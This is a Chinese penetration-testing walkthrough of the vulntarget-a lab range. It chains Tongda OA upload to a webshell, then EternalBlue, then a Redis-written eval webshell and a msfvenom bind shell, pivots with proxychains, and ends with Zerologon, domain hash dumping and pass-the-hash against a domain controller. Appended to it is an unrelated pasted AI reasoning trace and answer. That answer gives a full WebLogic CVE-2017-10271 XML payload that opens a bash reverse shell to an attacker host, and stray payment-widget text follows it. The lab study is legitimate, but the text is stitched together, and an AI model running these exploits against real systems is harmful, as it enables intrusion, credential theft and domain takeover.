[vulntarget靶场] vulntarget-a

靶场地址:https://github.com/crow821/vulntarget

拓扑结构

在这里插入图片描述

信息收集

主机发现

netdiscover -r 192.168.127.0/24 -i eth0

在这里插入图片描述

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130

在这里插入图片描述

访问目标80,发现为通达oa

在这里插入图片描述

WIN7漏洞利用

通达oa后台getshell

默认账号admin,空密码登录后台

在这里插入图片描述

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

在这里插入图片描述

点击系统管理 -> 附件管理 -> 添加存储目录

在这里插入图片描述

点击组织 -> 系统管理员 -> 上传附件

在这里插入图片描述

上传txt后缀文件,根据windows系统自动去掉.的特性,利用burp抓包修改文件后缀为.php.

在这里插入图片描述

文件上传到:http://192.168.127.130/im/2309/528190762.a.php,利用哥斯拉连接

在这里插入图片描述

在这里插入图片描述

CVE-2017-0144(永恒之蓝)

除了80端口的通达oa,目标还开放了445端口

msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run

在这里插入图片描述

内网渗透

查看win7网卡信息,发现存在另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

利用msf的post/windows/gather/arp_scanner模块收集内网存活主机

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

在这里插入图片描述

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run

在这里插入图片描述

修改/etc/proxychains4.conf

在这里插入图片描述

利用proxychains4对内网10.0.20.99主机进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

在这里插入图片描述

在80端口发现phpinfo.php,得到网站根目录路径: C:/phpStudy/PHPTutorial/WWW/

在这里插入图片描述

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

在这里插入图片描述

proxychains4代理,利用哥斯拉连接

proxychains4 java -jar godzilla.jar

在这里插入图片描述

在这里插入图片描述

关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off		#关闭防火墙

在这里插入图片描述

#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

在这里插入图片描述

利用哥斯拉上传

在这里插入图片描述

执行

.\shell.exe

在这里插入图片描述

msf上线

exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run

在这里插入图片描述

win2016上发现另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

发现win2016加入域,域名:vulntarget.com

在这里插入图片描述

查看域内主机

net group "Domain Computers" /domain

在这里插入图片描述

查看域控

net group "Domain Controllers" /domain

在这里插入图片描述

域控ip:10.0.10.110

ping -n 1 WIN2019

在这里插入图片描述

CVE-2020-1472上线域控

打空域控密码,exp:https://github.com/VoidSec/CVE-2020-1472

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

在这里插入图片描述

wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110
net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

连接3389

proxychains4 remmina

在这里插入图片描述

切换动态分辨率

在这里插入图片描述

在这里插入图片描述

恢复域控密码

保存注册表

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

下载.save文件到本地解密

lget sam.save
lget security.save
lget system.save

在这里插入图片描述

解密

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

还原密码

proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0

在这里插入图片描述

再次尝试dump域控hash,发现失败,证明已经还原

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述

<think>好的,用户想了解在Vulhub靶场上设置或利用CVE-2017-10271漏洞的方法。首先,我需要回忆一下这个漏洞的基本情况。CVE-2017-10271是WebLogic的一个远程代码执行漏洞,由于XML反序列化处理不当导致攻击者可以发送恶意请求执行任意命令。 接下来,用户提到的是Vulhub靶场,所以我需要确认Vulhub是否包含这个漏洞的环境。根据提供的引用内容,引用[4]提到了weblogic cve-2017-10271漏洞复现,但用户提供的引用中并没有直接给出Vulhub的配置步骤,而是提到了vulfocus。可能用户混淆了不同靶场,但Vulhub确实有多个WebLogic漏洞的环境,需要检查是否存在CVE-2017-10271的具体配置。 首先,用户需要搭建Vulhub环境。通常步骤是安装Docker和docker-compose,然后从Vulhub的GitHub仓库下载环境。接着在对应漏洞目录下启动容器。假设Vulhub中有该漏洞的环境,用户需要进入对应的目录,比如vulhub/weblogic/CVE-2017-10271,执行docker-compose up -d启动环境。 然后是漏洞利用部分。该漏洞利用通常涉及发送构造的XML请求到WebLogic的wls-wsat组件。使用工具如curl或Python脚本发送恶意HTTP POST请求,其中包含反序列化payload,比如通过XML中嵌入Java代码执行命令。例如,用户可能使用反弹shell的命令,将bash -i重定向到攻击者的监听端口。 需要注意的地方包括确保靶场环境正确启动,端口开放,以及替换利用代码中的IP和端口为实际的攻击机地址。此外,测试完毕后要关闭环境,避免留下安全隐患。 用户可能遇到的问题包括环境配置错误、依赖未安装,或者利用代码的格式问题。需要提醒用户检查Docker服务状态,确认目录正确,以及利用代码中的特殊字符是否正确转义。 最后,按照用户要求生成相关问题,可能需要涵盖漏洞原理、其他相关漏洞、防护措施以及调试方法等。</think>### Vulhub靶场中CVE-2017-10271漏洞配置与利用方法 #### 环境搭建步骤 1. **安装Docker与Vulhub** 确保系统已安装Docker和docker-compose,通过以下命令拉取Vulhub漏洞库: ```bash git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d ``` 启动后,WebLogic服务将运行在`http://靶机IP:7001`。 2. **验证环境** 访问`http://靶机IP:7001/console`,若出现WebLogic登录页面,则环境搭建成功[^4]。 --- #### 漏洞利用方法 1. **构造恶意请求** 漏洞存在于`wls-wsat`组件的XML反序列化处理。通过发送包含恶意代码的POST请求触发漏洞。 **示例Payload**(反弹Shell): ```http POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 靶机IP:7001 Content-Type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"><string>/bin/bash</string></void> <void index="1"><string>-c</string></void> <void index="2"><string>bash -i >& /dev/tcp/攻击机IP/监听端口 0>&1</string></void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` 2. **启动监听并触发漏洞** - 攻击机上执行: ```bash nc -lvp 监听端口 ``` - 发送上述Payload至目标服务器,成功后将在攻击机获得Shell权限。 --- #### 关键注意事项 1. **特殊字符转义** XML中需对`&`, `>`等符号转义,例如将`>`替换为`&gt;`,否则请求会因格式错误被拒绝。 2. **环境清理** 测试完成后执行: ```bash docker-compose down ``` --- #### 漏洞原理分析 CVE-2017-10271因WebLogic的`wls-wsat`组件未严格过滤XML输入,导致攻击者可通过反序列化操作执行任意Java代码。其核心问题在于`XMLDecoder`未对输入数据做安全检查[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值